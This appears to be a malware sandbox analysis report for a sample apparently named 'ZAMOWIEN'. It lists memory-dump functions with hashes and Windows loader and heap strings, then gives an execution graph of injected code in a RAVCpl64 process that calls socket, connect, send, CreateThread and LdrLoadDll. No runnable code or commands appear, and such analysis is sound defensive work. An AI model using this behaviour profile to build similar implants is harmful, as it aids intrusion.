                                                                                  • Opcode Fuzzy Hash: 68bbd26d0f4e72a5d79a3287e535a88f9c95f318c0d5b06c20a2a5e01d9ed802
                                                                                  • Instruction Fuzzy Hash: 3F417EB6A00209EFDF01CF95C885AEEBBB6FF4A364F140459E804AB300D731A912CB90
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$@$@w1w
                                                                                  • API String ID: 3446177414-3663980583
                                                                                  • Opcode ID: cb8feb65496ab2dfa6799cd7e4359de33f50435a139e05519fb512f173d90711
                                                                                  • Instruction ID: 5b3b6ed08c195e42d337b6a37d6e35749348d99de009665596ccf212e2279e0e
                                                                                  • Opcode Fuzzy Hash: cb8feb65496ab2dfa6799cd7e4359de33f50435a139e05519fb512f173d90711
                                                                                  • Instruction Fuzzy Hash: 16814BB1D012699BEB21CF54CC45BEEB7B8AF08750F0045EAE909B7290D7349E85CFA5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                  • API String ID: 3446177414-3492000579
                                                                                  • Opcode ID: 6cc1445d62f1078f49ac7b5eac1dc9b07058eab841a1f3f8c1ddcc95489d57df
                                                                                  • Instruction ID: 959ab374e6333580384f443a754c35da611a43661fea4a63b1a3a856262b91e8
                                                                                  • Opcode Fuzzy Hash: 6cc1445d62f1078f49ac7b5eac1dc9b07058eab841a1f3f8c1ddcc95489d57df
                                                                                  • Instruction Fuzzy Hash: 0F71BD75900685EFCF01CF68C5A16BDFBF2FF8A320F048499E455AB251CB399942CB55
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37729854, 37729895
                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37729843
                                                                                  • LdrpLoadShimEngine, xrefs: 3772984A, 3772988B
                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37729885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-3589223738
                                                                                  • Opcode ID: a1222b389e4d64cdffe3ba31b905fc2185387321b438858eb9560aaaa86a5bfc
                                                                                  • Instruction ID: 41f5686805c84b32a480a9f6a3f4eb10ab1cfddee698d288d36a9dab1f4e6f24
                                                                                  • Opcode Fuzzy Hash: a1222b389e4d64cdffe3ba31b905fc2185387321b438858eb9560aaaa86a5bfc
                                                                                  • Instruction Fuzzy Hash: B6513475A003469FDF14CBA8C8A9B9D77B6EF49324F080129E411FF295CB789C11CB86
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                  • API String ID: 3446177414-3224558752
                                                                                  • Opcode ID: b60a8337d647d38f2445310da2026451853e1d9d85c02ee6a44c0574da67f4a7
                                                                                  • Instruction ID: 4d4348fd7e8671b0eac1371ff833de8a74e2bc2c9ee52b23487df33669ac5a2d
                                                                                  • Opcode Fuzzy Hash: b60a8337d647d38f2445310da2026451853e1d9d85c02ee6a44c0574da67f4a7
                                                                                  • Instruction Fuzzy Hash: 1D415875602701DFF701CF24C8A4B5AB7A9EF41374F0489A9E4059B782CB39F981CB96
                                                                                  APIs
                                                                                  Strings
                                                                                  • ---------------------------------------, xrefs: 3777EDF9
                                                                                  • Entry Heap Size , xrefs: 3777EDED
                                                                                  • HEAP: , xrefs: 3777ECDD
                                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3777EDE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                  • API String ID: 3446177414-1102453626
                                                                                  • Opcode ID: b94b21989fbb7ac043885c4be7c014ffd29e500980986419f8b2c6cf225c3615
                                                                                  • Instruction ID: be41e965631637cb24b89e78614617307897193912ea18e569989e266b01cd19
                                                                                  • Opcode Fuzzy Hash: b94b21989fbb7ac043885c4be7c014ffd29e500980986419f8b2c6cf225c3615
                                                                                  • Instruction Fuzzy Hash: 81419D79A10252DFCF04CF14C48596ABBE6EF4936472988AAD409AF311C7B5EC62CF80
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                  • API String ID: 3446177414-1222099010
                                                                                  • Opcode ID: b9e23c12d24adeb6ee31d6903951d253f7979e1b4820baa27fd1c6be9cf0bbc0
                                                                                  • Instruction ID: f5a4d0cbe182add0544c7c98cf65f0f1512f0bb50091e3fa7fc44b4189ffa28a
                                                                                  • Opcode Fuzzy Hash: b9e23c12d24adeb6ee31d6903951d253f7979e1b4820baa27fd1c6be9cf0bbc0
                                                                                  • Instruction Fuzzy Hash: FC3167B5202784EFF712CF24C839F5A77A8EF016B4F040899E4015B653CB6AFA41CA53
                                                                                  APIs
                                                                                  Strings
                                                                                  • LdrpFindDllActivationContext, xrefs: 37743440, 3774346C
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 37743466
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3774344A, 37743476
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37743439
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 3446177414-3779518884
                                                                                  • Opcode ID: ed9662b775131e067bd75fd322420c1232b7627398364ee48d6cc41668978cd8
                                                                                  • Instruction ID: 0ff22ffd8b9481021e0cfe94de9db931a51ae3af421ae6acbd52e2aac431e648
                                                                                  • Opcode Fuzzy Hash: ed9662b775131e067bd75fd322420c1232b7627398364ee48d6cc41668978cd8
                                                                                  • Instruction Fuzzy Hash: E031FBB6A40351AFEB11DB05CC89B6772E5FB4B7B4F428556D4046F150E764AC80CFD2
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3773A7AF
                                                                                  • DGj7, xrefs: 376F2382
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3773A79F
                                                                                  • LdrpDynamicShimModule, xrefs: 3773A7A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DGj7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-8647285
                                                                                  • Opcode ID: b17405cf6b3693e4167587801f1a458c2cc47688fced28edcea1e78eda339602
                                                                                  • Instruction ID: c369a72941dd01498ccbccdfc3f6bae8e2c13737c21b5071960bf32c56daf1fb
                                                                                  • Opcode Fuzzy Hash: b17405cf6b3693e4167587801f1a458c2cc47688fced28edcea1e78eda339602
                                                                                  • Instruction Fuzzy Hash: B03137B6A40202EFFF108F19C8D6B9E77B5EF88760F110069F901BB251DB785852CB92
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 3446177414-3610490719
                                                                                  • Opcode ID: 7ae6c6d8dccd77db8fef0405493a20119b55b21dc89ffae277bee25f495d97f7
                                                                                  • Instruction ID: b138707144a67a65031daa648e69ba5f5673cbf94af2f18faf9f317462267229
                                                                                  • Opcode Fuzzy Hash: 7ae6c6d8dccd77db8fef0405493a20119b55b21dc89ffae277bee25f495d97f7
                                                                                  • Instruction Fuzzy Hash: 26913772314742EFE715CB24C8A4BAAB3ADEF48650F041899F8509F685DB78EC41CB93
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37739F2E
                                                                                  • LdrpCheckModule, xrefs: 37739F24
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 37739F1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-161242083
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377480F3
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 377480E2
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 377480E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-1783798831
                                                                                  APIs
                                                                                  Strings
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37754508
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37754519
                                                                                  • LdrpCheckRedirection, xrefs: 3775450F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 3446177414-3154609507
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Wow64 Emulation Layer
                                                                                  • API String ID: 3446177414-921169906
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                  • String ID:
                                                                                  • API String ID: 4281723722-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: ${w7
                                                                                  • API String ID: 0-2374622220
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$Flst
                                                                                  • API String ID: 0-758220159
                                                                                  APIs
                                                                                  Strings
                                                                                  • kLsE, xrefs: 376D05FE
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376D0586
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 3446177414-2547482624
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: 0$0
                                                                                  • API String ID: 3446177414-203156872
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: ^l7
                                                                                  • API String ID: 3446177414-3567266305
                                                                                  • Opcode ID: b7f670075ddf609b1f977f742010d4938c1c958b9c62284ef8210c31e5296b43
                                                                                  • Instruction ID: c246c57310db4b6bb29beb2e2dde4acacbb5a4e588d36cb1614f113e739065c1
                                                                                  • Opcode Fuzzy Hash: b7f670075ddf609b1f977f742010d4938c1c958b9c62284ef8210c31e5296b43
                                                                                  • Instruction Fuzzy Hash: 4F419EB9A10202DFDB05CF2AC4945697BF6FF88720B10847AE8099B360DB34E851CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: l7$ml7
                                                                                  • API String ID: 3446177414-3629240536
                                                                                  • Opcode ID: c6cbf0c1c44a3676d8ae89e9f93f306bf14f65d99389be751e92c23ee57bc77f
                                                                                  • Instruction ID: e7a1925fc42578db2c32a4482a4041875a6bf8ae6bd95e0f7a16665b1c59850c
                                                                                  • Opcode Fuzzy Hash: c6cbf0c1c44a3676d8ae89e9f93f306bf14f65d99389be751e92c23ee57bc77f
                                                                                  • Instruction Fuzzy Hash: EE11C6B5A01209AFDF11CF98D985ADEBBB9FF4C360F104129F911B7240D735A954CBA1

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.5%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:34
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 4173 694628 4177 694644 4173->4177 4174 6946de 4175 69466b SleepEx 4175->4177 4177->4174 4177->4175 4178 693138 4177->4178 4180 69317d 4178->4180 4179 69321a 4179->4177 4179->4179 4180->4179 4181 693203 SleepEx 4180->4181 4181->4180 4182 69c708 4184 69c745 4182->4184 4183 69c779 closesocket 4184->4183 4204 6939a8 4205 6939bd 4204->4205 4206 693a88 4205->4206 4207 693a5a CreateThread 4205->4207 4185 6939cf 4187 6939f5 4185->4187 4186 693a88 4187->4186 4188 693a5a CreateThread 4187->4188 4189 69c45e 4190 69c4b0 4189->4190 4191 69c4e4 socket 4190->4191 4192 69c59e 4193 69c5ae 4192->4193 4194 69c625 send 4193->4194 4195 69c63c 4194->4195 4196 69c651 4197 69c63c 4196->4197 4198 69c654 4196->4198 4199 69c6d5 connect 4198->4199 4200 69daf4 4201 69db20 4200->4201 4202 69db24 4201->4202 4203 69db60 LdrLoadDll 4201->4203 4203->4202

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID: $
                                                                                  • API String ID: 2422867632-3993045852
                                                                                  • Opcode ID: 6ba2fa942537049f391406450a83df265e82cc50171adb771a302d613cc065ac
                                                                                  • Instruction ID: 5cf5cf066634319678a93d4f9a52d0d6365c1c0fce6b5bf9dc54f931febe7277
                                                                                  • Opcode Fuzzy Hash: 6ba2fa942537049f391406450a83df265e82cc50171adb771a302d613cc065ac
                                                                                  • Instruction Fuzzy Hash: BF11E63120C7444FEF88EF68D48A3A9B7D5FB85324F08057ED489CB292EB769542C746

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 693138-693177 17 69317d-693181 16->17 18 69320b-693214 17->18 19 693187-69318a 17->19 18->17 20 69321a-693223 18->20 19->18 21 69318c-693201 call 6a0338 call 6a0308 call 6a0a78 19->21 22 69325c-693279 20->22 23 693225-693229 20->23 21->18 35 693203-693209 SleepEx 21->35 25 69322b-693232 23->25 26 693244-69324d 23->26 28 693238-693242 25->28 26->22 29 69324f-693253 26->29 28->26 28->28 29->22 31 693255-693256 29->31 31->22 35->18
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 4fcb3bbb58052db225a92d78c73de1d6063abf8ea2ccd6a8abda84529cb32855
                                                                                  • Instruction ID: e3cc1c80cbb1e02ce5b3a801b359b925dde995c33e0b76a8fdd8c381b6bc0232
                                                                                  • Opcode Fuzzy Hash: 4fcb3bbb58052db225a92d78c73de1d6063abf8ea2ccd6a8abda84529cb32855
                                                                                  • Instruction Fuzzy Hash: 7131E27151CB588FDF28DF08D8816EA73E5FB85301F40065EE88A87606DB30EA46CBD6

                                                                                  Control-flow Graph

